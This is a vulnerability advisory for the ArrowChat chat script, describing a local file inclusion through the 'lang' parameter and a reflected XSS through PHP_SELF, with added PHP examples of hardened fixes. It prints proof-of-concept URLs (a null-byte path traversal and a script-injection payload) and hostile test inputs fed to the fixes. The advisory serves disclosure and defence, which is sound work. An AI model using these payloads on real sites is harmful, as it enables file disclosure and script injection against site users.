Vendor: ArrowChat
By: Kallimero
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion & Reflected XSS
CWE: 98, 79
Product Name: ArrowChat
Affected Version From: 1.5.61
Affected Version To: 1.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian
Year: 2013

ArrowChat <=~ 1.5.61 Multiple vulnerabilities

ArrowChat is a chat script that can be integrated into various CMSs, such as WordPress, and into some bulletin boards. The local file inclusion is caused by missing validation of the 'lang' GET parameter in external.php: the value is concatenated into a file path and passed to include(), which allows an attacker to include arbitrary files on the server. The reflected XSS is caused by admin/layout/pages_general.php echoing $_SERVER['PHP_SELF'] (which contains the client-controlled request path) into a form action without encoding, which allows an attacker to inject arbitrary HTML and script code.

Mitigation:

To fix the LFI, replace the language-loading block in external.php with the patched version given in the advisory below, which only includes the language file when 'lang' matches a strict letters-only whitelist. To fix the XSS, encode the values echoed into the form action in admin/layout/pages_general.php (htmlentities/htmlspecialchars) and restrict access to the layout directory, as described in the "How to Fix" section below.

Exploit-DB raw data:

# Exploit Title: ArrowChat <=~ 1.5.61  Multiple vulnerabilities
# Date: 01/01/2013
# Exploit Author: Kallimero
# Version: 1.5.61, before, and maybe 1.6
# Tested on: Debian


Introduction
============

ArrowChat is a chat script that can be integrated into various CMSs, such as
WordPress, and into some bulletin boards.


Vulnz
========


1- ) Local File Inclusion


external.php lets us load a language, but not in a secure way.

---------------[external.php]---------------

// Load another language if lang GET value is set and exists
if (var_check('lang'))
{
    $lang = get_var('lang');

    if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
    {
        include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
    }
}
---------------[/external.php]---------------

Thanks to the null-byte trick, we'll be able to include any PHP file, like
this:

http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs

2- ) reflected XSS

The administration layout is accessible to anyone. Even if we can't execute
the admin's PHP code, we can inject HTML thanks to $_SERVER['PHP_SELF'].


Example :
-------[admin/layout/pages_general.php]-----

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php
echo $do; ?>" enctype="multipart/form-data">
----------------------------------

PoC:
http://[site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>


How to Fix ?
============

To fix the LFI, you can replace it with:

// Load another language if lang GET value is set and exists
if (var_check('lang'))
{
    $lang = get_var('lang');
    // Whitelist: 2 to 5 letters only, so "../", "/" and "%00" can never reach
    // the path. (PCRE's $ still accepts a trailing newline; add the D modifier,
    // "#^[a-z]{2,5}$#iD", if you want it strict.)
    if (preg_match("#^[a-z]{2,5}$#i", $lang))
    {
        if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
        {
            include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
        }
    }
}

lang will be included only if it names a valid language file.
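The following is an added example, not ArrowChat's code and not from the advisory author: a self-contained PHP version of the hardened language loader. It keeps the advisory's whitelist regex (with the D modifier so a trailing newline is also rejected) and adds a realpath() containment check as defence in depth, then runs a handful of constructed 'lang' values through it, including the traversal and null-byte shapes from the PoC. AC_FOLDER_LANGUAGE is the ArrowChat constant named in the advisory; the temporary language tree, the function name resolve_language_file() and the sample inputs are assumptions made for the demo.

```php
<?php
// Added example (not ArrowChat's code): hardened language-file resolution for
// external.php. Returns the absolute path to include, or null to refuse.
declare(strict_types=1);

const AC_FOLDER_LANGUAGE = 'lang'; // name taken from the advisory

/**
 * Resolve the language file for $lang below $baseDir/AC_FOLDER_LANGUAGE.
 * Returns null if $lang is not a plain language code or the file does not
 * resolve to a location inside the language directory.
 */
function resolve_language_file(string $lang, string $baseDir): ?string
{
    // Whitelist: 2-5 ASCII letters. The D modifier makes $ strict, so "en\n"
    // is rejected too; dots, slashes and NUL bytes can never pass, which
    // closes the ../ and %00 vectors described in the advisory.
    if (!preg_match('#^[a-z]{2,5}$#iD', $lang)) {
        return null;
    }

    $langRoot = realpath($baseDir . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE);
    if ($langRoot === false) {
        return null; // language directory missing
    }

    $candidate = realpath($langRoot . DIRECTORY_SEPARATOR . $lang
        . DIRECTORY_SEPARATOR . $lang . '.php');

    // Defence in depth: even with the regex, the resolved file must sit below
    // the language root (guards against symlinks or a later regex change).
    $prefix = $langRoot . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

// --- demo: build a throwaway language tree so the checks can be observed ---
$base    = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'arrowchat_demo_' . getmypid();
$langDir = $base . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE;
$enDir   = $langDir . DIRECTORY_SEPARATOR . 'en';
$enFile  = $enDir . DIRECTORY_SEPARATOR . 'en.php';
mkdir($enDir, 0700, true);
file_put_contents($enFile, "<?php \$ac_lang = 'English';\n");

// Constructed inputs: one legitimate value, then shapes mirroring the PoC.
$inputs = [
    'en',                 // installed language: accepted
    "../path/to/file\0",  // null-byte truncation attempt: rejected by regex
    '../../index',        // plain traversal: rejected by regex
    "en\n",               // trailing newline: rejected thanks to D modifier
    'fr',                 // valid shape, but not installed: rejected
];

foreach ($inputs as $lang) {
    $file = resolve_language_file($lang, $base);
    printf("%-22s => %s\n", json_encode($lang), $file === null ? 'rejected' : 'include ' . $file);
}

// In external.php the call would be:
//   if (var_check('lang')) {
//       $f = resolve_language_file(get_var('lang'), dirname(__FILE__));
//       if ($f !== null) { include $f; }
//   }

// cleanup of the demo tree
unlink($enFile);
rmdir($enDir);
rmdir($langDir);
rmdir($base);
```

Only the first input resolves to a file; everything else is refused before any filesystem call reaches include(). The containment check is redundant with the regex today, but it is the part that keeps the loader safe if someone later relaxes the whitelist to allow region codes such as "pt-br".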

For the XSS, you can use a .htaccess to protect the layout directory, and
use htmlentities to avoid the HTML injection.
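The following is an added example, not ArrowChat's code and not from the advisory author: it shows the form action from admin/layout/pages_general.php rebuilt with output encoding, and runs it against constructed $_SERVER values that reproduce the PoC request (an extra path segment appended after the script name). The helper names attr(), form_action() and render_form(), and the sample 'do' values, are assumptions for the demo; SCRIPT_NAME and PHP_SELF are the standard PHP server variables.

```php
<?php
// Added example (not ArrowChat's code): safe construction of the form action
// attribute that the advisory shows being built from raw $_SERVER['PHP_SELF'].
declare(strict_types=1);

/**
 * Encode a value for a double-quoted HTML attribute. ENT_QUOTES also encodes
 * the single quote the PoC relies on; ENT_SUBSTITUTE avoids an empty string
 * on invalid UTF-8 (which would otherwise silently drop the value).
 */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the action attribute value. SCRIPT_NAME is the script path without
 * the client-appended PATH_INFO, so prefer it over PHP_SELF; encode either way.
 */
function form_action(array $server, string $do): string
{
    $self = $server['SCRIPT_NAME'] ?? $server['PHP_SELF'] ?? '';
    return attr($self) . '?do=' . attr($do);
}

function render_form(array $server, string $do): string
{
    return '<form method="post" action="' . form_action($server, $do)
        . '" enctype="multipart/form-data">';
}

// Constructed $_SERVER values reproducing the advisory's PoC request.
$poc = [
    'PHP_SELF'    => "/admin/layout/pages_general.php/'\"/><script>alert(1);</script>",
    'SCRIPT_NAME' => '/admin/layout/pages_general.php',
];
$normal = [
    'PHP_SELF'    => '/admin/layout/pages_general.php',
    'SCRIPT_NAME' => '/admin/layout/pages_general.php',
];

echo "Original template, raw PHP_SELF (what the advisory reports):\n";
echo '<form method="post" action="' . $poc['PHP_SELF'] . '?do=general" enctype="multipart/form-data">', "\n\n";

echo "Hardened, same request (SCRIPT_NAME drops the injected segment):\n";
echo render_form($poc, 'general'), "\n\n";

echo "Hardened, SCRIPT_NAME unavailable (falls back to encoded PHP_SELF):\n";
echo render_form(['PHP_SELF' => $poc['PHP_SELF']], 'general'), "\n\n";

echo "Hardened, hostile do value is encoded as well:\n";
echo render_form($normal, '"><img src=x onerror=alert(1)>'), "\n";
```

In the hardened output the quotes and angle brackets arrive in the page as `&quot;`, `&#039;`, `&lt;` and `&gt;`, so the browser sees one attribute value and no new tag. Encoding is the fix for the injection itself; the .htaccess the advisory recommends (`Require all denied` on Apache 2.4, `Deny from all` on 2.2, for the admin/layout directory) is a separate control that stops unauthenticated users from reaching those templates at all, and both should be applied.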



Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0,
gr4ph0s.
Please visit : http://www.orgasm.re/